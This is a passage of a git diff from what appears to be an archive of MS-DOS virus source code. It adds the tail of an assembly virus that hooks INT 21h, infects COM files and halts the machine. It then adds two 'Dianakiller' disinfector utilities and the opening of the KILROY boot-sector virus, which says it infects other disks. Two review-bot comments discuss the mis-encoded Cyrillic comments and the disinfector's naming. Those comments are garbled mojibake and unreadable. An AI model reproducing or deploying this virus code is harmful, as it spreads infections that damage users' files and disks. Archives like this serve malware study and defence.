pop es ; €ª® ­¥ ¥ 10:26 , ²® §­ ·¨ ­¿¬ ¸ + pop bx ; ¢¨°³± ¨ ­¿¬  ¤  ­ ¬ «¨ · ±  ± + pop ax ; ­¥®¡µ®¤¨¬¨²¥ ¡ ©²®¢¥ ¨«¨ ¤º«- + db (0CAh) ; ¦¨­ ²  ­  ¢¨°³±  ¢ ±«³·¥¿. 
+ dw (2) + + ;****************************************************; + ;* ‡   °   § ¿ ¢   ­ ¥ *; + ;****************************************************; + +mm: pushf + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH DS + PUSH ES + PUSH SI + PUSH DI + xor ax,ax + mov ds,ax + mov di,[0194h] + mov es,[0196h] + mov ax,[004ch] + mov bx,[004eh] + mov cx,0f000h + mov dx,0ec59h + mov [0100h],dx + mov [0102h],cx + mov [0198h],ax + mov [019ah],bx + mov [004ch],di + mov [004eh],es + mov ax,0a15h+new24-begin + push cs + pop ds + push cs + pop es + mov ah,2ch + call new21 + cmp cx,0200h + jna mm1 + mov ax,0003h + int 10h + mov ah,09h + mov dx,0a15h+n-begin + call new21 + cli + hlt + +dinge: jmp ding + +mm1: mov ah,2fh ;Dos service function ah=2FH (get DTA) + call new21 + mov cs:[8b0h],es + mov cs:[8b2h],bx + MOV AH,4eH + MOV DX,0a10h+files-okey + mov cx,0 + call new21 + jc dinge ;CX File attribute + ;DS:DX Pointer of filespec (ASCIIZ string) +vir: mov ax,534bh + cmp es:[bx+16h],ax + jnz fuck +vir1: mov ah,4fh + call new21 + jc enzi + jmp short vir +enzi: jmp ding +fuck: mov cx,1500 + cmp es:[bx+1ah],cx + jna vir1 +fuck1: push es + pop ds + mov ax,3d02h + mov dx,bx + add dx,1eh + call new21 + mov cs:[0a10h+handle-okey],ax + mov bx,ax + push cs + pop ds + mov ah,3fh + mov dx,0a10h + mov cx,5 + call new21 + mov di,0a10h+end-okey + mov al,0e9h + mov [di],al + inc di + mov bx,[8b2h] + mov cx,es:[bx+1ah] + inc cx + inc cx + mov [di],cx + inc di + inc di + mov ax,534bh + mov [di],ax + mov bx,cs:[0a10h+handle-okey] + mov ax,4200h + xor cx,cx + xor dx,dx + call new21 + mov ah,40h + mov dx,0a10h+end-okey + mov cx,5 + call new21 + mov ax,4202h + xor cx,cx + xor dx,dx + call new21 + push cs + pop ds + mov bx,cs:[0a10h+handle-okey] + mov ah,40h + mov dx,0a10h + mov cx,end-okey-3 + call new21 + mov bx,cs:[0a10h+handle-okey] + mov ax,5700h + call new21 + mov ax,5701h + mov cx,534bh + call new21 + mov ah,3eh + call new21 +ding: xor ax,ax + mov ds,ax + mov ax,[0198h] + mov bx,[019ah] + mov 
[004ch],ax + mov [004eh],bx + POP DI + POP SI + POP ES + POP DS + POP DX + POP CX + POP BX + POP AX + popf + +int1hh: jmp word ptr cs:[8c0h] ; °¥ªº±¢ ­¥ 21 + +files: db '*.com',0 ; ‡ ° §¿¢  ± ¬® COM ´ ©«®¢¥ + +new24: mov al,03 ; Int 24h ¤  ­¥ ¤ ¢  Write Protect + iret + +ding2: MOV AX,0070h ; ‚«¨§  ¢ ±¥£¬¥­ 0070h: ¨ ¯°¥²º°±¢  + MOV ES,AX ; §  ­¥®¡µ®¤¨¬¨²¥ ¡ ©²®¢¥ ­  INT13H + MOV DI,0000h + MOV AX,80FBh +non1: CLD + MOV CX,0FFFFh +non2: REPNZ SCASW + JZ non + MOV DI,0001h + JMP non1 +non: MOV BX,02FCh + CMP ES:[DI],BX + JNZ non2 + DEC DI + DEC DI + xor ax,ax ;  £« ±¿ ­®¢®²® ¯°¥ªº±¢ ­¥ INT13H ¨ + mov ds,ax ; ¨ ±¥ ¯®¤£®²¢¿ §  ° ¡®²  + mov [0194h],di + mov [0196h],es + mov es,[009eh] + mov bx,[00a0h] + push cs + pop ds + MOV BP,DS + pop si + push si ; °¥µ¢º°«¿ ¢¨°³±  ¢ ±²¥ª  ­  + MOV DI,0a10h ; COMMAND.COM + MOV CX,Handle-Okey ; € ±º¹® ² ª  ¨ ¯®¤£®²¢¿ + REP MOVSB ; ¢¨°³±  ¤®¡°¥ ¤  ±¥ ³ª°¥¯¨ + PUSH ES ; ¨ ®¯«¥²¥ ± Int 21h + LEA DI,[BX+1bh] + MOV AL,0e9h + STOSB + MOV AX,0A30h + SUB AX,DI + STOSW + MOV AX,9090H + STOSW + STOSW + MOV ES:[8c0h],DI + MOV AX,SS + SUB AX,0018h + CLI + MOV SS,AX + STI + MOV DS,BP + POP ES + pop si + pop cx + xor ax,ax + xor bx,bx + xor dx,dx + xor si,si + mov di,100h + push di + xor di,di + ret +n: db "K.I.I.S.ø ",024h ; ’®§¨ ²¥±² ±¥ ®²¯¥· ²¢  ±«¥¤ 2 · ± . +handle: dw ? ; € ±º¹® ² ª  ¡«®ª¨°  ª®¬¯¾²º° . +end: db (00) + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.kildia.asm b/MSDOS/Virus.MSDOS.Unknown.kildia.asm new file mode 100644 index 00000000..7b486ae8 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.kildia.asm 
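Review bot: The comments in this file are unreadable as stored: byte runs like `‘¢. Š«¨¬¥­²` and the header block look like CP866 (DOS Cyrillic) text that has been passed through a Western single-byte code page, and the only comment that survives in English is `;Dos service function ah=2FH (get DTA)`. Since the header appears to carry the sample's only provenance (a 1991 date and what seems to be a university name), an archive note stating the original code page — or a transcoded copy of the comment text — would let analysts read it without guessing. A short English line next to the data labels (`files`, `handle`, `end`) saying which are referenced by the hard-coded `0a10h+…-okey` offsets would also help, because those offsets are the only documentation of the in-memory layout the code depends on.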
@@ -0,0 +1,541 @@ + +memS equ 1 ;model small convertable to COM model +;**************** RUNTIME LIBRARY OF KILLDIANA.COM ************** +include lcmac.mac +calln macro name + call near ptr name + endm +callp macro name + lea dx,name + calln print + endm +callz macro name + push si + lea si,name + calln printz + pop si + endm + +dgroup group data,udata,xstack + assume ds:data + +pgroup group prog,tail +prog segment byte public 'prog' + assume cs:prog + + org 100h ;FOR MODEL COM + +start label far + cli + mov ax,offset pgroup:xtail ;get end of code group + add ax,16 ;calculate segment address of ds + mov cl,4 ;calculate segment address of ds + shr ax,cl ;calculate segment address of ds + mov bx,cs ;calculate segment address of ds + add ax,bx ;calculate segment address of ds + mov ds,ax ;set ds to dgroup + mov es,ax ;set es to dgroup + mov ss,ax ;set ss to dgroup + mov ds:_ss,ax ;save stack segment for (do,for,while) + mov sp,offset dgroup:sbase + 512 ;range of stack = 512 bytes + mov ds:_top,sp ;save stack pointer for (do,for,while) + mov bx,offset dgroup:sbase ;get stack segment for (do,for,while) + mov ds:_base,bx ;save stack segment for (do,for,while) + sti + mov ah,30h ;get dos version number + int 21h + mov ds:_dos,ax ;save dos version for (do,for,while) + callp copyr + callp tryrem + calln remove + callp weak + + lea di,fname + mov si,82h +getf: + mov al,cs:[si] + cmp al,0dh + je tonul + cmp al,' ' + jc blank + mov [di],al + inc di +blank: inc si + .br getf +tonul: clr al + mov [di],al + calln prefix + calln comwrk +; calln exewrk + mov ah,4ch + int 21h ;exit to DOS + +print proc near + mov ah,9 + int 21h + ret +print endp + +comwrk proc near + calln first + jc toret + calln workcom +ffnext: + calln fnext + jc toret + calln workcom + .br ffnext +toret: + ret +comwrk endp +fnext proc near + mov ah,4fh ;findnext + int 21h + jc ercc + jnc foundf +fnext endp +first proc near + lea dx,fname + mov cx,27h ;search all types of files + mov ah,4eh ;findfirst + int 21h + 
jnc foundf + callp notfnd +ercc: stc + ret +foundf: + calln konka + clc + ret +first endp +konka proc near + mov ah,2fh + int 21h ;get dta in es:bx + add bx,26 + mov ax,es:[bx] + mov llfil,ax ;save lowlengh + inc bx + inc bx + mov ax,es:[bx] + mov lhfil,ax ;save highlengh + inc bx + inc bx ;pointed to fname + lea si,ffname + lea di,fname + push es + push ds + pop es + mov cx,40h +repe cmpsb + pop es + dec si +copyf: mov al,es:[bx] + mov [si],al + inc si + inc bx + or al,al + jne copyf + ret +konka endp + +prefix proc near + lea si,fname + add si,40h + mov cx,40h + std +lodi: + lodsb + cmp al,'\' + je founds + cmp al,':' + je founds + loop lodi + mov nepar,offset fname + .br endcp +founds: + inc si + inc si + mov nepar,si + lea si,fname + lea di,ffname +cpag: + cmp si,nepar + jae endcp + mov al,[si] + mov [di],al + inc si + inc di + .br cpag +endcp: + cld + ret +prefix endp + + +remove proc near + push ds + clr ax + mov ds,ax + les bx,ds:[84h] ;21h vector + mov ax,cs + mov dx,es + cmp dx,ax + jc nodia + cmp bx,2eeh + jne nodia + + mov ax,es:[74fh] + mov ds:[84h],ax ;restore 21h + mov ax,es:[751h] + mov ds:[86h],ax + + mov ax,es:[74bh] + mov ds:[9ch],ax ;restore 27h + mov ax,es:[74dh] + mov ds:[9eh],ax + mov ax,es + mov bx,ax + dec ax + mov es,ax + mov es:byte ptr[0],5ah + mov es:word ptr[1],0 + pop ds + callp diakt + ret +nodia: + pop ds + callp dinakt + ret +remove endp + +workcom proc near + lea dx,ffname + mov ax,4300h ;get attrib + int 21h + jnc kopa + jmp retga +kopa: + mov al,cl + and al,0feh + cmp al,cl + je nochatr + + mov attr,cx + mov ax,4301h ;set attrib + clr cx ;to normal + int 21h + .br nochh +nochatr: + mov attr,0 +nochh: + mov ax,3d02h ;open file R/W + int 21h + jnc kop1 + jmp resatr +kop1: mov bx,ax + calln gettm + mov cx,18h + lea dx,bufer + mov ah,3fh ;read first 3 bytes + int 21h + jc closs2 + mov di,dx + mov ax,ds:[di] + cmp ax,5a4dh + jne commfil + push bx + calln exework + pop bx + jc chek2 + jmp closs + +commfil: + mov al,ds:[di] + cmp 
al,0e9h + je mak111 + jmp closs +mak111: mov si,ds:[di+1] ;relative offset + add si,3 + mov di,si + sub si,68h + mov len,si + + clr cx + mov dx,di + mov ax,4200h + int 21h ;seek to found e80000 +closs2: jc clos21 + + lea dx,bufer + add dx,18h+3 + mov cx,7 ;read 7 bytes + mov ah,3fh + int 21h ;read +clos21: jnc chek1 +chek2: jmp closs +chek1: + mov di,dx + cmp ds:byte ptr[di],0e8h + jne chek2 + cmp ds:word ptr[di+1],0 + jne chek2 + cmp ds:word ptr[di+4],0ee81h + jne chek2 + cmp ds:word ptr[di+6],6bh + jne chek2 + + clr cx + mov dx,si + add dx,705h + mov ax,4200h + int 21h ;seek to found org 3bytes + jc closs + lea dx,bufer + add dx,18h + mov cx,3 ;read 3 bytes + mov ah,3fh + int 21h ;read + jc closs + lea si,bufer +restor3: + mov al,[si+18h] + mov [si],al + inc si + loop restor3 + clr cx + clr dx + mov ax,4200h ;seek to begin + int 21h + jc closs + + mov cx,18h + lea dx,bufer + mov ah,40h ;write + int 21h + jc closs + + clr cx + mov dx,len + mov ax,4200h ;seek to end of real data + int 21h + jc resatr +exelen: + clr cx + mov ah,40h ;truncate file + int 21h + push bx + callp file + callz ffname + callp isok + + pop bx +closs: + calln settm + mov ah,3eh + int 21h ;close file + +resatr: + mov cx,attr ;to old attributes + or cx,cx + je retga + lea dx,ffname + mov ax,4301h ;set attrib + int 21h +retga: + ret +workcom endp +printz proc near +eter: mov ah,2 + lodsb + or al,al + je caret + mov dl,al + int 21h + .br eter +caret: + ret +printz endp + +gettm proc near + mov ax,5700h + int 21h + jc qget + mov atcx,cx + mov atdx,dx +qget: + ret +gettm endp + +settm proc near + mov ax,5701h + mov cx,atcx + mov dx,atdx + or cx,cx + je qset + or dx,dx + je qset + int 21h +qset: + ret +settm endp +exework proc near + mov ax,[di+16h] ;get main lenght in pargarphs + mov cx,16 + mul cx + push bx + mov bx,[di+8] + mov cl,4 + shl bx,cl + add ax,[di+14h] ;get IP + adc dx,0 + add ax,bx + adc dx,0 + pop bx + mov exhlen,dx + mov exllen,ax + mov cx,dx + mov dx,ax + mov ax,4200h + int 21h 
;seek to begin Diana code + + lea dx,bufer + add dx,18h+3 + mov cx,7 ;read 7 bytes + mov ah,3fh + int 21h ;read + jc echek2 + mov di,dx + cmp ds:byte ptr[di],0e8h + jne echek2 + cmp ds:word ptr[di+1],0 + jne echek2 + cmp ds:word ptr[di+4],0ee81h + jne echek2 + cmp ds:word ptr[di+6],6bh + je exgoin +echek2: + stc + ret +exgoin: + sub exllen,68h + sbb exhlen,0 ;contains lenght of file + + mov dx,exllen + mov cx,exhlen + add dx,707h + adc cx,0 + mov ax,4200h + int 21h ;seek to old vectors + lea dx,bufer + add dx,26h + mov cx,1 + mov ah,3fh + int 21h ;read old cs:ip, ss:sp + jc echek2 + + mov dx,exllen + mov cx,exhlen + add dx,6fdh + adc cx,0 + mov ax,4200h + int 21h ;seek to old vectors + lea dx,bufer + add dx,18h + mov cx,8 + mov ah,3fh + int 21h ;read old cs:ip, ss:sp + jc echek2 + + mov ax,llfil + mov dx,lhfil + sub ax,exllen + sbb dx,exhlen + mov lhfil,dx + mov llfil,ax + lea di,bufer + mov ax,[di+4] + mov cx,512 + mul cx + add ax,[di+2] + adc dx,0 + sub ax,llfil + sbb dx,lhfil + div cx + mov cx,dx + mov dl,[di+26h] + sub cx,dx + mov rema,cx + mov [di+2],dx ;store remainder of lenght + mov [di+4],ax ;store /512 lenght + + mov ax,[di+18h] ;get ip + mov [di+14h],ax ;store + mov ax,[di+1ah] ;get cs: + mov [di+16h],ax ;store + + mov ax,[di+1ch] ;get sp + mov [di+10h],ax ;store + mov ax,[di+1eh] ;get ss: + mov [di+0eh],ax ;store + + clr cx + clr dx + mov ax,4200h + int 21h ;seek to prefix + mov cx,18h ;to write new prefix + lea dx,bufer + mov ah,40h + int 21h ;write 18h bytes prefix + mov cx,exhlen + mov dx,exllen + sub dx,rema + sbb cx,0 + mov ax,4200h + int 21h ;seek end of file + jmp exelen +exework endp + +prog ends + +tail segment word 'prog' ;help segment to allocate end of code +xtail dw -1 ;and set the data segment +tail ends + +data segment para public 'data' ;data segment + +fname db 40h dup(0) +ffname db 40h dup(0) +bufer db 27h dup(0) +_ss dw ? ;Lattice variables +_base dw ? ;Lattice variables +_dos dw ? ;Lattice variables +_top dw ? 
;Lattice variables +nepar dw 0 +fhand dw 0 +exhlen dw 0 +exllen dw 0 +llfil dw 0 +lhfil dw 0 +len dw 0 +attr dw 0 +atcx dw 0 +atdx dw 0 +rema dw 0 +notfnd db 'File not found',13,10,'$' +copyr db 'Dianakiller program V1.0 (C)Copyright Deny_Soft 1989',13,10,'$' +tryrem db 'Searching Diana in memory...',13,10,'$' +diakt db 'Diana found',7,' and removed extra',13,10,'$' +dinakt db "Diana isn't active",13,10,"$" +weak db 'Searching for weak files...',13,10,'$' +file db 'File $' +isok db 9,9,' ... restored',13,10,'$' + +data ends + .pub <_ss,_base,_dos,_top> ;make external +udata segment public 'data' +udata ends +xstack segment 'data' +sbase dw 512 dup (?) +xstack ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.killeddi.asm b/MSDOS/Virus.MSDOS.Unknown.killeddi.asm new file mode 100644 index 00000000..b3701233 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.killeddi.asm 
@@ -0,0 +1,654 @@ + +memS equ 1 ;model small convertable to COM model +;**************** RUNTIME LIBRARY OF KILLDIANA.COM ************** +include lcmac.mac +calln macro name + call near ptr name + endm +callp macro name + lea dx,name + calln print + endm +callz macro name + push si + lea si,name + calln printz + pop si + endm + +dtas struc + resv db 21 dup(?) + atr db ? + hour dw ? + min dw ? + lfil dw ? + hfil dw ? + sname db 14 dup(?) +dtas ends + +dgroup group data,udata,xstack + assume ds:data + +pgroup group prog,tail +prog segment byte public 'prog' + assume cs:prog + + org 100h ;FOR MODEL COM + +start label far + cli + mov ax,offset pgroup:xtail ;get end of code group + add ax,16 ;calculate segment address of ds + mov cl,4 ;calculate segment address of ds + shr ax,cl ;calculate segment address of ds + mov bx,cs ;calculate segment address of ds + add ax,bx ;calculate segment address of ds + mov ds,ax ;set ds to dgroup + mov es,ax ;set es to dgroup + mov ss,ax ;set ss to dgroup + mov ds:_ss,ax ;save stack segment for (do,for,while) + mov sp,offset dgroup:sbase + 512 ;range of stack = 512 bytes + mov ds:_top,sp ;save stack pointer for (do,for,while) + mov bx,offset dgroup:sbase ;get stack segment for (do,for,while) + mov ds:_base,bx ;save stack segment for (do,for,while) + sti + mov ah,30h ;get dos version number + int 21h + mov ds:_dos,ax ;save dos version for (do,for,while) + callp copyr + callp tryrem + calln remove + push cs + pop es + + mov di,81h +getf: + mov cx,80 + cld + mov al,0dh +repne scasb + jne quiter + dec di + cmp di,81h + je quiter + mov si,di + mov cx,di + mov cs:byte ptr[di],0 +srcc: + dec si + mov al,cs:[si] + cmp al,'\' + je fndd + cmp al,':' + je fndd + cmp si,82h + jae srcc + dec si +fndd: + sub cx,si + jcxz quiter + lea di,fname + inc si +cpcp: mov al,cs:[si] + cmp al,' ' + jbe incsi + mov [di],al + inc di +incsi: + inc si + loop cpcp + callp weak + lea dx,root + mov ah,3bh ;chdir to root + int 21h ;chdir to root + calln findir +quiter: 
+ mov ah,4ch + int 21h ;exit to DOS + +print proc near + mov ah,9 + int 21h + ret +print endp + +comwrk proc near + calln first + jc toret + calln workcom +ffnext: + calln fnext + jc toret + calln workcom + .br ffnext +toret: + ret +comwrk endp +fnext proc near + lea dx,mydta + mov ah,1ah + int 21h + mov ah,4fh ;findnext + int 21h + jc ercc + jnc foundf +fnext endp +first proc near + lea dx,mydta + mov ah,1ah + int 21h + lea dx,fname + mov cx,27h ;search all types of files + mov ah,4eh ;findfirst + int 21h + jnc foundf +; callp notfnd +ercc: stc + ret +foundf: + calln konka + clc + ret +first endp +konka proc near + mov ah,2fh + int 21h ;get dta in es:bx + add bx,26 + mov ax,es:[bx] + mov llfil,ax ;save lowlengh + inc bx + inc bx + mov ax,es:[bx] + mov lhfil,ax ;save highlengh + inc bx + inc bx ;pointed to fname + lea si,ffname +copyf: mov al,es:[bx] + mov [si],al + inc si + inc bx + or al,al + jne copyf + ret +konka endp + + + +remove proc near + push ds + clr ax + mov ds,ax + les bx,ds:[84h] ;21h vector + mov ax,cs + mov dx,es + cmp dx,ax + jc nodia + cmp bx,2eeh + jne nodia + + mov ax,es:[74fh] + mov ds:[84h],ax ;restore 21h + mov ax,es:[751h] + mov ds:[86h],ax + + mov ax,es:[74bh] + mov ds:[9ch],ax ;restore 27h + mov ax,es:[74dh] + mov ds:[9eh],ax + mov ax,es + mov bx,ax + dec ax + mov es,ax + mov es:byte ptr[0],5ah + mov es:word ptr[1],0 + pop ds + callp diakt + ret +nodia: + pop ds + callp dinakt + ret +remove endp + +workcom proc near + lea dx,ffname + mov ax,4300h ;get attrib + int 21h + jnc kopa + jmp retga +kopa: + mov al,cl + and al,0feh + cmp al,cl + je nochatr + + mov attr,cx + mov ax,4301h ;set attrib + clr cx ;to normal + int 21h + .br nochh +nochatr: + mov attr,0 +nochh: + mov ax,3d02h ;open file R/W + int 21h + jnc kop1 + jmp resatr +kop1: mov bx,ax + calln gettm + mov cx,18h + lea dx,bufer + mov ah,3fh ;read first 3 bytes + int 21h + jc closs2 + mov di,dx + mov ax,ds:[di] + cmp ax,5a4dh + jne commfil + push bx + calln exework + pop bx + jc chek2 + 
jmp closs + +commfil: + mov al,ds:[di] + cmp al,0e9h + je mak111 + jmp closs +mak111: mov si,ds:[di+1] ;relative offset + add si,3 + mov di,si + sub si,68h + mov len,si + + clr cx + mov dx,di + mov ax,4200h + int 21h ;seek to found e80000 +closs2: jc clos21 + + lea dx,bufer + add dx,18h+3 + mov cx,7 ;read 7 bytes + mov ah,3fh + int 21h ;read +clos21: jnc chek1 +chek2: jmp closs +chek1: + mov di,dx + cmp ds:byte ptr[di],0e8h + jne chek2 + cmp ds:word ptr[di+1],0 + jne chek2 + cmp ds:word ptr[di+4],0ee81h + jne chek2 + cmp ds:word ptr[di+6],6bh + jne chek2 + + clr cx + mov dx,si + add dx,705h + mov ax,4200h + int 21h ;seek to found org 3bytes + jc closs + lea dx,bufer + add dx,18h + mov cx,3 ;read 3 bytes + mov ah,3fh + int 21h ;read + jc closs + lea si,bufer +restor3: + mov al,[si+18h] + mov [si],al + inc si + loop restor3 + clr cx + clr dx + mov ax,4200h ;seek to begin + int 21h + jc closs + + mov cx,18h + lea dx,bufer + mov ah,40h ;write + int 21h + jc closs + + clr cx + mov dx,len + mov ax,4200h ;seek to end of real data + int 21h + jc resatr +exelen: + clr cx + mov ah,40h ;truncate file + int 21h + push bx + callp file + callz ffname + callp isok + + pop bx +closs: + calln settm + mov ah,3eh + int 21h ;close file + +resatr: + mov cx,attr ;to old attributes + or cx,cx + je retga + lea dx,ffname + mov ax,4301h ;set attrib + int 21h +retga: + ret +workcom endp +printz proc near +eter: mov ah,2 + lodsb + or al,al + je caret + mov dl,al + int 21h + .br eter +caret: + ret +printz endp + +gettm proc near + mov ax,5700h + int 21h + jc qget + mov atcx,cx + mov atdx,dx +qget: + ret +gettm endp + +settm proc near + mov ax,5701h + mov cx,atcx + mov dx,atdx + or cx,cx + je qset + or dx,dx + je qset + int 21h +qset: + ret +settm endp +exework proc near + mov ax,[di+16h] ;get main lenght in pargarphs + mov cx,16 + mul cx + push bx + mov bx,[di+8] + mov cl,4 + shl bx,cl + add ax,[di+14h] ;get IP + adc dx,0 + add ax,bx + adc dx,0 + pop bx + mov exhlen,dx + mov exllen,ax + mov 
cx,dx + mov dx,ax + mov ax,4200h + int 21h ;seek to begin Diana code + + lea dx,bufer + add dx,18h+3 + mov cx,7 ;read 7 bytes + mov ah,3fh + int 21h ;read + jc echek2 + mov di,dx + cmp ds:byte ptr[di],0e8h + jne echek2 + cmp ds:word ptr[di+1],0 + jne echek2 + cmp ds:word ptr[di+4],0ee81h + jne echek2 + cmp ds:word ptr[di+6],6bh + je exgoin +echek2: + stc + ret +exgoin: + sub exllen,68h + sbb exhlen,0 ;contains lenght of file + + mov dx,exllen + mov cx,exhlen + add dx,707h + adc cx,0 + mov ax,4200h + int 21h ;seek to old vectors + lea dx,bufer + add dx,26h + mov cx,1 + mov ah,3fh + int 21h ;read old cs:ip, ss:sp + jc echek2 + + mov dx,exllen + mov cx,exhlen + add dx,6fdh + adc cx,0 + mov ax,4200h + int 21h ;seek to old vectors + lea dx,bufer + add dx,18h + mov cx,8 + mov ah,3fh + int 21h ;read old cs:ip, ss:sp + jc echek2 + + mov ax,llfil + mov dx,lhfil + sub ax,exllen + sbb dx,exhlen + mov lhfil,dx + mov llfil,ax + lea di,bufer + mov ax,[di+4] + mov cx,512 + mul cx + add ax,[di+2] + adc dx,0 + sub ax,llfil + sbb dx,lhfil + div cx + mov cx,dx + mov dl,[di+26h] + sub cx,dx + mov rema,cx + mov [di+2],dx ;store remainder of lenght + mov [di+4],ax ;store /512 lenght + + mov ax,[di+18h] ;get ip + mov [di+14h],ax ;store + mov ax,[di+1ah] ;get cs: + mov [di+16h],ax ;store + + mov ax,[di+1ch] ;get sp + mov [di+10h],ax ;store + mov ax,[di+1eh] ;get ss: + mov [di+0eh],ax ;store + + clr cx + clr dx + mov ax,4200h + int 21h ;seek to prefix + mov cx,18h ;to write new prefix + lea dx,bufer + mov ah,40h + int 21h ;write 18h bytes prefix + mov cx,exhlen + mov dx,exllen + sub dx,rema + sbb cx,0 + mov ax,4200h + int 21h ;seek end of file + jmp exelen +exework endp + +findir proc near + ; get dta + mov ah,2fh + int 21h + mov word ptr olddta[0],bx + mov word ptr olddta[2],es + ;***** + lea dx,mydta + mov ah,1ah + int 21h + calln comwrk + mov word ptr fflag,0 + calln basewr + + ; restore dta + push ds + lds dx,olddta + mov ah,1ah + int 21h + pop ds + ret +findir endp + +basewr proc near 
+ cmp word ptr fflag,0 + jne nnextt + calln fdir + jc baret + jnc checkk +nnextt: + calln ndir + jc baret +checkk: + mov bx,odta + test ds:byte ptr[bx + dtas.atr],10h + je nnextt + cmp byte ptr dtas.sname[bx],'.' + je nnextt + mov ah,3bh ;chdir + mov dx,offset dtas.sname + add dx,bx + int 21h ;chdir + calln pdir + calln comwrk + mov fflag,0 + inc coudir + calln basewr +bare: + pushf + lea dx,point + mov ah,3bh ;chdir up + int 21h ;chdir up + dec coudir + jns nosig + mov coudir,0 +nosig: + mov fflag,1 + popf + .br nnextt + +baret: + ret +basewr endp +ndir proc near + calln stdta + mov ah,4fh + int 21h + ret +ndir endp +fdir proc near + calln stdta + lea dx,aster + mov cx,37h + mov ah,4eh + int 21h + ret +fdir endp +stdta proc near + mov ax,44 + mul word ptr coudir + add ax,offset dtatab + mov odta,ax + mov dx,ax + mov ah,1ah + int 21h + ret +stdta endp +pdir proc near + push si + lea si,curdir + clr dl + mov ah,47h + int 21h + lea si,curdir + calln printz + callp carret + pop si + ret +pdir endp +prog ends + +tail segment word 'prog' ;help segment to allocate end of code +xtail dw -1 ;and set the data segment +tail ends + +data segment para public 'data' ;data segment + + +fname db 10h dup(0) +ffname db 10h dup(0) +mydta db 48 dup(?) +bufer db 28h dup(0) +dtatab dtas 12 dup(<>) +curdir db 64 dup(?) +_ss dw ? ;Lattice variables +_base dw ? ;Lattice variables +_dos dw ? ;Lattice variables +_top dw ? ;Lattice variables +odta dw 0 +olddta dd 0 +nepar dw 0 +fhand dw 0 +exhlen dw 0 +exllen dw 0 +llfil dw 0 +lhfil dw 0 +len dw 0 +attr dw 0 +atcx dw 0 +atdx dw 0 +rema dw 0 +coudir dw 0 +fflag dw 0 +;notfnd db 'File not found',13,10,'$' +copyr db 'Dianakiller program V1.1 (C)Copyright Deny_Soft 1989',13,10,'$' +tryrem db 'Searching Diana in memory..',13,10,'$' +diakt db 'Diana found',7,' and removed extra',13,10,'$' +dinakt db "Diana isn't active",13,10,"$" +weak db 'Searching for weak files...',13,10,'$' +file db 'File $' +isok db 9,9,' ... 
restored',13,10,'$' +carret db 13,10,'$' +aster db '*.*',0 +point db '..',0 +root db '\',0 + +data ends + .pub <_ss,_base,_dos,_top> ;make external +udata segment public 'data' +udata ends +xstack segment 'data' +sbase dw 512 dup (?) +xstack ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.kilroy.asm b/MSDOS/Virus.MSDOS.Unknown.kilroy.asm new file mode 100644 index 00000000..f7b58cb0 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.kilroy.asm 
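Review bot: The file is committed under a `Virus.MSDOS.Unknown.*` name, but its visible strings and routines describe a disinfector, not a virus: `copyr db 'Dianakiller program V1.1 ...'`, `diakt db 'Diana found',7,' and removed extra'`, `isok db 9,9,' ... restored'`, and `workcom`/`exework` seek back to the pre-infection length and truncate (`mov ah,40h ;truncate file`). A header comment such as `; Dianakiller V1.1 -- removal utility for the Diana virus: unhooks INT 21h/27h from the resident copy and truncates infected COM/EXE files` would stop the sample being catalogued alongside the malware it targets. It would also be worth documenting that `remove` identifies the resident copy only by a fixed INT 21h vector offset (`cmp bx,2eeh`) and then restores the vectors from `es:[74fh]`/`es:[74bh]` and marks the arena header free (`mov es:byte ptr[0],5ah`), so it is safe to run only against that exact variant and should be tried in an isolated environment first.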
@@ -0,0 +1,315 @@ +;The KILROY one-sector boot sector virus will both boot up either MS-DOS or +;PC-DOS and it will infect other disks. + +;This segment is where the first operating system file (IBMBIO.COM or IO.SYS) +;will be loaded and executed from. We don't know (or care) what is there, but +;we do need the address to jump to defined in a separate segment so we can +;execute a far jump to it. +DOS_LOAD SEGMENT AT 0070H + ASSUME CS:DOS_LOAD + + ORG 0 + +LOAD: DB 0 ;Start of the first operating system program + +DOS_LOAD ENDS + + +MAIN SEGMENT BYTE + ASSUME CS:MAIN,DS:MAIN,SS:NOTHING + +;This jump instruction is just here so we can compile this program as a COM +;file. It is never actually executed, and never becomes a part of the boot +;sector. Only the 512 bytes after the address 7C00 in this file become part of +;the boot sector. + ORG 100H + +START: jmp BOOTSEC + +;The following two definitions are BIOS RAM bytes which contain information +;about the number and type of disk drives in the computer. These are needed by +;the virus to decide on where to look to find drives to infect. They are not +;normally needed by an ordinary boot sector. + + ORG 0410H + +SYSTEM_INFO: DB ? ;System info byte: Take bits 6 & 7 and add 1 to get number of + ;disk drives on this system (eg 01 = 2 drives) + + ORG 0475H + +HD_COUNT: DB ? ;Number of hard drives in the system + +;This area is reserved for loading the boot sector from the disk which is going +;to be infected, as well as the first sector of the root directory, when +;checking for the existence of system files and loading the first system file. + + ORG 0500H + +DISK_BUF: DW ? ;Start of the buffer + + ORG 06FEH + +NEW_ID: DW ? ;Location of AA55H in boot sector loaded at DISK_BUF + +;Here is the start of the boot sector code. This is the chunk we will take out +;of the compiled COM file and put it in the first sector on a 360K floppy disk. 
+;Note that this MUST be loaded onto a 360K floppy to work, because the +;parameters in the data area that follow are set up to work only with a 360K +;disk! + + ORG 7C00H + +BOOTSEC: JMP BOOT ;Jump to start of boot sector code + + ORG 7C03H ;This is needed because the jump will get coded as 2 bytes + +DOS_ID: DB 'KILROY ' ;Name of this boot sector (8 bytes) +SEC_SIZE: DW 200H ;Size of a sector, in bytes +SECS_PER_CLUST: DB 02 ;Number of sectors in a cluster +FAT_START: DW 1 ;Starting sector for the first File Allocation Table (FAT) +FAT_COUNT: DB 2 ;Number of FATs on this disk +ROOT_ENTRIES: DW 70H ;Number of root directory entries +SEC_COUNT: DW 2D0H ;Total number of sectors on this disk +DISK_ID: DB 0FDH ;Disk type code (This is 360KB) +SECS_PER_FAT: DW 2 ;Number of sectors per FAT +SECS_PER_TRK: DW 9 ;Sectors per track for this drive +HEADS: DW 2 ;Number of heads (sides) on this drive +HIDDEN_SECS: DW 0 ;Number of hidden sectors on the disk + +DSKBASETBL: + DB 0 ;Specify byte 1: step rate time, head unload time + DB 0 ;Specify byte 2: Head load time, DMA mode + DB 0 ;Wait time until motor turned off, in clock ticks + DB 0 ;Bytes per sector (0=128, 1=256, 2=512, 